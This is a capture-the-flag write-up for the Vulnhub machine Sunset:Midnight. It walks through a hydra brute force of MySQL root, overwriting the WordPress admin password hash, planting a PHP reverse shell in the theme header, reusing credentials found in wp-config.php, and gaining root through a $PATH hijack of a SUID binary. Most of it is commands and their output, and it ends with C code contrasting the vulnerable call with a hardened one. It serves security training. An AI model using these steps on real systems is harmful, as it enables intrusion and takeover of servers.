[VULNHUB] Sunset:Midnight

Today we are going to hack the Vulnhub machine called Sunset:Midnight. You can download it from the following link: Sunset-Midnight


Enumeration


We start with nmap to see which ports are open.

~ > nmap -A -p- 192.168.1.112
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-18 10:50 CEST
Nmap scan report for midnight.home (192.168.1.112)
Host is up (0.00040s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA)
|   256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
|_  256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://sunset-midnight/
3306/tcp open  mysql   MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
|   Thread ID: 15
|   Capabilities flags: 63486
|   Some Capabilities: InteractiveClient, LongColumnFlag, Support41Auth, ConnectWithDatabase, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, IgnoreSigpipes, SupportsTransactions, Speaks41ProtocolNew, ODBCClient, FoundRows, DontAllowDatabaseTableColumn, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: WpR'kgE^-c+Jq{9H@DvG
|_  Auth Plugin Name: 104
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.19 seconds
We see that port 3306 (mysql) is open and that we can interact with it, so we brute-force the root user on mysql with hydra.

~ > hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.112 mysql
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-18 10:51:34
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
[DATA] attacking mysql://192.168.1.112:3306/
[3306][mysql] host: 192.168.1.112   login: root   password: robert
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-18 10:51:43
We found the password! We log in to mysql with the credentials we obtained.

~ > mysql mysql -h 192.168.1.112 -u root -p
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 206
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [mysql]>
We check which databases there are.

MariaDB [mysql]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress_db       |
+--------------------+
4 rows in set (0.001 sec)

MariaDB [mysql]> 
We select the "wordpress_db" database and look at its tables...

MariaDB [mysql]> use wordpress_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress_db]> show tables;
+------------------------+
| Tables_in_wordpress_db |
+------------------------+
| wp_commentmeta         |
| wp_comments            |
| wp_links               |
| wp_options             |
| wp_postmeta            |
| wp_posts               |
| wp_sp_polls            |
| wp_term_relationships  |
| wp_term_taxonomy       |
| wp_termmeta            |
| wp_terms               |
| wp_usermeta            |
| wp_users               |
+------------------------+
13 rows in set (0.001 sec)

MariaDB [wordpress_db]> 
We look at the "wp_users" table.

MariaDB [wordpress_db]> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email          | user_url               | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
|  1 | admin      | $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ | admin         | example@example.com | http://sunset-midnight | 2020-07-16 19:10:47 |                     |           0 | admin        |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
1 row in set (0.000 sec)

MariaDB [wordpress_db]> 
Since we are "root", we can modify the table data. We will change the password so we can log in to WordPress as admin (WordPress still accepts a legacy plain MD5 hash and re-hashes it on the next login, so an MD5 digest is enough). To do that we generate a password:

~ > echo -n "pass123" | md5sum
32250170a0dca92d53ec9624f336ca24  -
We run the update (the password is pass123):

MariaDB [wordpress_db]> update wp_users SET user_pass="32250170a0dca92d53ec9624f336ca24" where user_login="admin"
    -> ;
Query OK, 1 row affected (0.010 sec)
Rows matched: 1  Changed: 1  Warnings: 0
We add 192.168.1.112 sunset-midnight to /etc/hosts and visit http://sunset-midnight/wp-login.php. We are now logged in to WordPress as admin :)

Next we add a reverse shell: we edit /usr/share/webshells/php/php-reverse-shell.php and put in our IP. Once it is modified, in WordPress we go to Appearance -> Theme Editor and edit header.php, adding our PHP reverse shell. With that done, we start nc listening:

~ > nc -nlvp 1234
listening on [any] 1234 ...
We visit http://sunset-midnight/ and get our shell :)

Low Shell



~ > nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.59] from (UNKNOWN) [192.168.1.112] 54120
Linux midnight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
 06:01:19 up  1:11,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
Once inside, we explore the system. Since WordPress is installed, we look at the wp-config.php file.

www-data@midnight:/$ cd /var/www/html/wordpress
www-data@midnight:/var/www/html/wordpress$ ls
ls
index.php	 wp-blog-header.php    wp-includes	  wp-settings.php
license.txt	 wp-comments-post.php  wp-links-opml.php  wp-signup.php
readme.html	 wp-config.php	       wp-load.php	  wp-trackback.php
wp-activate.php  wp-content	       wp-login.php	  xmlrpc.php
wp-admin	 wp-cron.php	       wp-mail.php
www-data@midnight:/var/www/html/wordpress$ cat wp-config.php
--SNIP--
define( 'DB_NAME', 'wordpress_db' );
define( 'DB_USER', 'jose' );
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );
define( 'DB_HOST', 'localhost' );
--SNIP--
We see that wp-config.php contains the user "jose" and his password. We know there is a user called jose on the system, so we try logging in with those credentials.

www-data@midnight:/home$ su jose
Password: 645dc5a8871d2a4269d4cbe23f6ae103
jose@midnight:/home$ id
uid=1000(jose) gid=1000(jose) groups=1000(jose),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)

user.txt


Now as jose, we read the user.txt flag.

jose@midnight:/home$ cd /home/jose
jose@midnight:~$ ls
user.txt
jose@midnight:~$ cat user.txt
956a9564aa5632edca7b745c696f6575
We keep looking around the system; next we check the SUID files.

jose@midnight:~$ find / -perm -4000 2>/dev/null
--SNIP--
/usr/bin/su
/usr/bin/sudo
/usr/bin/status
/usr/lib/openssh/ssh-keysign
--SNIP--
We see a "status" binary, which is not a usual one, so we take a look at it with strings to see if there is anything interesting.

Privilege Escalation



jose@midnight:~$ strings /usr/bin/status
--SNIP--
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
service ssh status
--SNIP--
We see that the binary runs "service ssh status" with a relative path rather than an absolute one, so we can create our own "service", change $PATH and run the binary so that our "service" is executed with root permissions. Our "service" will simply be a file containing "/bin/bash", so that it gives us a root shell. Let's set it up!

jose@midnight:~$ echo "/bin/bash" > service
jose@midnight:~$ chmod +x service
jose@midnight:~$ export PATH=.:$PATH
jose@midnight:~$ /usr/bin/status
root@midnight:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),1000(jose)
We now have a shell with root privileges!
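As an added example (this is not the machine's own status.c, which we never get to read), here is the pattern the strings output points at, a hardened version that removes the $PATH dependency, and a small audit helper that flags a $PATH which can be steered; the /usr/sbin/service location is an assumption.

```c
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable pattern (what strings on /usr/bin/status suggests): setuid(0),
 * then system() with a bare name; /bin/sh finds "service" via $PATH. */
int run_status_vulnerable(void)
{
    if (setuid(0) != 0)
        return -1;
    return system("service ssh status");
}

/* Audit check: 1 if any $PATH entry is relative or empty (both resolve
 * against the current directory), 0 if every entry is absolute. */
int path_has_relative_entry(const char *path)
{
    if (path == NULL || *path == '\0')
        return 1;
    for (const char *p = path;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        if (len == 0 || p[0] != '/')
            return 1;
        if (colon == NULL)
            return 0;
        p = colon + 1;
    }
}

/* Hardened form: absolute program path, fixed argv and a minimal environment
 * built here rather than inherited. Assumes the Debian 10 location
 * /usr/sbin/service. Returns the child's exit status, or -1 on failure. */
int run_status_hardened(void)
{
    char *const argv[] = {"/usr/sbin/service", "ssh", "status", NULL};
    char *const envp[] = {"PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL};
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, envp);
        _exit(127); /* exec failed: never fall back to a $PATH search */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The same check applies to any setuid wrapper: if the program name is not absolute, the caller controls what runs.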

root.txt



root@midnight:~# cd /root
root@midnight:/root# ls
root.txt  status  status.c
root@midnight:/root# cat root.txt
          ___   ____
        /' --;^/ ,-_\     \ | /
       / / --o\ o-\ \\   --(_)--
      /-/-/|o|-|\-\\|\\   / | \
       '`  ` |-|   `` '
             |-|
             |-|O
             |-(\,__
          ...|-|\--,\_....
      ,;;;;;;;;;;;;;;;;;;;;;;;;,.
~,;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,  ______   ---------   _____     ------

db2def9d4ddcb83902b884de39d426e6

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

End


And with that we are root on the machine.